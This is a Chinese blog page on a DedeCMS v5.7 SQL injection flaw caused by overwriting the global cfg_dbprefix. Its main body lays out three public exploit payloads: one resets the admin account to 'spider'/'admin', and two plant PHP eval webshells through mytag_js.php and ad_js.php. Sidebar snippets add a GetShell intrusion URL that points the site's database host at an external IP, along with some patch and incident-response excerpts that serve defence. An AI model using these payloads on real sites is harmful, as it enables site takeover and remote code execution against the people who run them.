dedecms mytag_js.php,DedeCMS v5.7最新漏洞

最新推荐文章于 2024-08-03 16:08:16 发布
最新推荐文章于 2024-08-03 16:08:16 发布
阅读量883 收藏
点赞数
文章标签: dedecms mytag_js.php

首先我们一起来了解下DedeCMS v5.7漏洞情况:

1、漏洞描述

漏洞所在版本:DedeCMS v5.7

漏洞发布时间:2013年06月07日

漏洞修复版本:DedeCMS v5.7 20130607之后版本

漏洞触发条件:确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll。

漏洞触发根源:在于/include/dedesql.class.php文件中程序未初始化$arrs1和$arrs2这两个数组,结合程序不安全的参数处理机制,导致我们能够覆盖程序中任意全局变量。因此我们可通过控制全局变量$GLOBALS['cfg_dbprefix']的值,进而通过$prefix值和/plus/download.php中的SQL语句构造,从而造成了此SQL注入漏洞。

由于DedeCMS使用广泛,而此高危注入漏洞利用方便,并且能够因此远程获取到管理后台管理员,或者可getshell获取到系统的控制权。网上已公开的有以下3种EXP:

1.1修改后台管理员

(1)如:构造如下注入SQL语句:

cfg_dbprefixadmin` SET `userid`='spider',

`pwd`='f297a57a5a743894a0e4' where id=1

#修改后台管理员为:用户名spider,密码admin。

(2)对应的EXP:

 a4c26d1e5885305701be709a3d33442f.png

(3)执行EXP后,相应后台数据库表变为如下:

 a4c26d1e5885305701be709a3d33442f.png

(4)因此相应后台登录用户变为spider密码admin

1.2通过/plus/mytag_js.php文件生成一句话木马php

(1)如:构造如下注入SQL语句:

cfg_dbprefixmytag` (aid,expbody,normbody)

VALUES(9013,@`\'`,'{dede:php}file_put_contents(''mybak.php'',''<?php

eval_r($_POST[mybak]);?>'');{/dede:php}') #

@`\'`

(2)对应的EXP:

 a4c26d1e5885305701be709a3d33442f.png

(3)执行EXP后,将向数据库表dede_mytag中插入一条记录,如图:

 a4c26d1e5885305701be709a3d33442f.png

1.3使/plus/ad_js.php文件变为一句话木马php

(1)如:构造如下注入SQL语句:

cfg_dbprefixmyad` SET `normbody` = '<?php

eval_r($_POST[m]);?>' WHERE `aid` =1 #

(2)对应的EXP:

 a4c26d1e5885305701be709a3d33442f.png

(3)执行EXP后,将向数据库表dede_myad中插入一条记录,如图;

 a4c26d1e5885305701be709a3d33442f.png

波拿拿
关注
mysql5.5.57 漏洞_DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞
weixin_42118161的博客
02-18 888
入侵步骤如下:http://www.oday.pw/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GL...
收割机Getshell软件.zip
05-30
扫描后缀.txt,存放shell扫描用的后缀,自己可以添加更多后缀。 webshell.txt,存放扫描到的Webshell。 uploaddata/asp.txt,存放asp上传文件。...uploaddata/php.txt,存放php上传文件。 收割机.exe,主程序
dedecms mytag_js.php,DedeCmsMytag 标记
weixin_39610488的博客
03-09 101
关键字描述:标记 定义 &nbsp 可以 模板 内容 效果 我们 代码 表示DedeCmsMytag 标记自定义宏标记的应用今天天涯来介绍下自定义宏标记的应用,大家可以进入后台,在“模板管理”-》“自定义宏标记”中查看到该选项。自定义宏标记的作用:可以将模板中多次出现的相同元素用一个自定义标记表示出来,从而达到,一次更改,全局更换的效果。辅助插件的广告管理也有相似的效果。适用范围:网页模...
dedeCMS /plus/ad_js.php、/plus/mytag_js.php Vul Via Injecting PHP Code By /plus/download.php Into DB ...
weixin_30388677的博客
01-20 578
目录 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 对于这个漏洞,我们可以简单概括如下 1. "/plus/download.php"文件会引入"/include/common.inc.php"文件 2. "/include/common.inc.php"中会对用户输入的变量进行"变...
DeDeCMS-漏洞复现
最新发布
weixin_57682301的博客
08-03 390
2.上传后访问你上传的一句话木马文件 我这里写的一句话木马为phpinfo,显示成功即可证明注入。4.点击生成--更新主页html,将htm后缀改成php并且生成静态,点击更新主页html。5.访问此页面,没有报错证明注入成功(由于没有回显,这里输入的POST传参)1.点击核心--文件式管理器 点击文件上传,将我们的一句话木马进行上传。2.进入后点击模板--默认模板管理,找到index.htm。3.点击右方的编辑进入后改成写入的一句话木马,然后点击保存。1.点击模板--广告管理--生成一个新广告。
dedecms mytag_js.php,诊断网站是否用织梦搭建,你知道有几个方法呢,我知道这几个?...
weixin_32821579的博客
03-09 204
原标题:诊断网站是否用织梦搭建,你知道有几个方法呢,我知道这几个?近来有不少站长咨询冬镜,为什么他发一个网站我就知道是用织梦搭建的,其实这个也不算是啥高新技术,自己熟悉一点dedecms的站长或者技术人员都是可以看得出来的。诊断网站是否用织梦搭建 判断网站是不是用织梦DEDECMS建的识别教程冬镜在这里只是简单分享几个常见的识别教程,鉴别是否用织梦搭建的方法并不仅限于此!诊断网站是否用织梦搭建 1...
dedecms 5.7 最新 mytag_js.php漏洞解决方法
gxtiou的专栏
02-19 6239
其实是安全检查的时候没有限制敏感变量 找到文件  /include/common.inc.php 将这行 大概在58行  if( strlen($_k)>0 && preg_match('/^(cfg_|GLOBALS)/',$_k) )  改为  if( strlen($_k)>0 && preg_match('/^(cfg_|GLOBALS|_GET|_PO
织梦plus mytag_js.php,织梦dedecms 插件plus文件调用头部尾部的方法
weixin_33470084的博客
03-27 323
织梦dedecms 插件plus文件调用头部尾部的方法织梦无忧2018-12-06 11:51摘要:织梦dedecms 插件plus文件调用头部尾部的方法 。 方法一: 进入自定义宏标记,正常显示内容里增加:{dede:include filename=head.htm/} 回到自定义标签列表,点击JS调用可以得到JS调用代码script src=/plus/mytag_js.php?aid=1 ...
VID_20201115_143620.mp4
12-07
I have an error code in lua which I have tried long to fix. first: the code: if boolean fs.isDirectory("C:/Program Files/Factorio/Config") == true then end else fs.makeDirectory("C:/Program Files/...
Android-LogCat-tool.zip_-baijiahao_android logcattool_logcat_log
09-14
- **过滤器**: 可以通过指定标签(tag)或优先级来过滤日志,例如`adb logcat *:V MyTag:D`,这将显示所有日志(包括verbose级别),同时对"MyTag"的日志特别关注,设置为debug级别。 2. **日志级别** - **V ...
应急响应实例分享1
08-04
单独的html页面还不足以成为后门,但是通过结合mytag_js.php文件就有了大用处,通过查看源码未发现mytag_js.php文件,从日志中也可看到之后在对mytag_js.php进行访问,服务器就已经响应404了,可见攻击者已经删除了...
dede tags.php漏洞,织梦dedecms安全漏洞之/include/common.inc.php漏洞解决办法
weixin_29266647的博客
03-10 392
foreach(Array('_GET','_POST','_COOKIE') as $_request){foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);}修改为复制代码foreach(Array('_GET','_POST','_COOKIE') as $_request){foreach($$_reques...
dedecms tag.php注入漏洞分析与利用工具
weixin_30267785的博客
08-25 486
author:toby57 [www.toby57.cn] date:2008-08-18 Dedecms算是使用比较广泛的PHP整站系统了,在被使用的同时系统的安全性也被人们关注。在以前dedecms也爆过不少漏洞,官方都很快出了补丁,前几天80sec公布了注射漏洞 http://www.80sec.com/dedecms-sql-injection.html,其实这个系统也受最近很流行的...
dedecms mytag_js.php,一种奇特的DEDE隐藏后门办法_91Ri.org
weixin_28965739的博客
03-09 4712
单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun.为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢?无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:Default{dede:php}file_put_contents(’90sec...
plusmytag_js.php,dedecms之webshell后门分析
weixin_42523711的博客
03-09 570
dedecms之webshell后门分析单位某站用的dedecms,今天被某黑阔getshell了,无奈只能打包代码进行分析,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:{dede:php}file_put_contents(’90sec.php’,'’);{/dede:php}但是翻遍所有的Web目录也没有找到90sec.php文件,有...
plusmytag_js.php,PHP等语言SQL注入的问题
weixin_36476695的博客
03-09 414
很多人在做开发的时候并没有注意到SQL的查询是可以被改掉的,其实SQL却是最不安全的因素之一,通过SQL,更有可能去直接执行系统命令,在服务器上新建用户,修改密码等操作也不是不可能。直接 SQL 命令注入就是攻击者常用的一种创建或修改已有 SQL 语句的技术,从而达到取得隐藏数据,或覆盖关键的值,甚至执行数据库主机操作系统命令的目的。这是通过应用程序取得用户输入并与静态参数组合成 SQL 查询来实...
织梦mytag_js.php,Dedecms搜索页面调用文章列表的方法
weixin_36171927的博客
03-11 150
余斗个人博客的搜索结果页做好之后,发现一个bug,右侧的最新文章和点击排行根本显示不出来,这里余斗用的是文章页模版的调用语句,在文章页可以正确显示,而搜索结果页则无效,代码如下:点击排行{dede:arclist row="8" orderby="click" titlelen="40"}[field:title/]{/dede:arclist}余斗修改标签语句好久都不能实现,百度了一下,发现原因...
mytag js.php入侵,防范 dedecms 广告内容插入后门
weixin_39679091的博客
03-10 330
dedecms广告内容没有做限制,可以输入脚本信息,并写入文件,导致木马植入!此补丁,是防止广告里带PHP脚本并写入文件!核心代码:ad_js.php//禁止写入和PHP脚本有关字符信息//==========================================================================if ((strripos($adbody,"")>=0...
应急响应实战笔记——Web实战篇:⑥ 管理员账号被篡改
君逍遥o
04-16 1134
你是某一个网站的管理员,有一天,你的管理员账号admin却登录不了,进入数据库查看,原来管理员账号用户名不存在了,却多了另外一个管理员用户名。不对,不是新增了管理员,而是你的管理员用户名被篡改了。
listbox.tag_config
05-11
`listbox.tag_config()`是一个Tkinter Listbox widget的方法,用于设置tag的样式,例如文本颜色、背景色等。它的语法如下: ``` ...这样,添加到Listbox中的所有带有"mytag"标签的项都会以红色显示。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值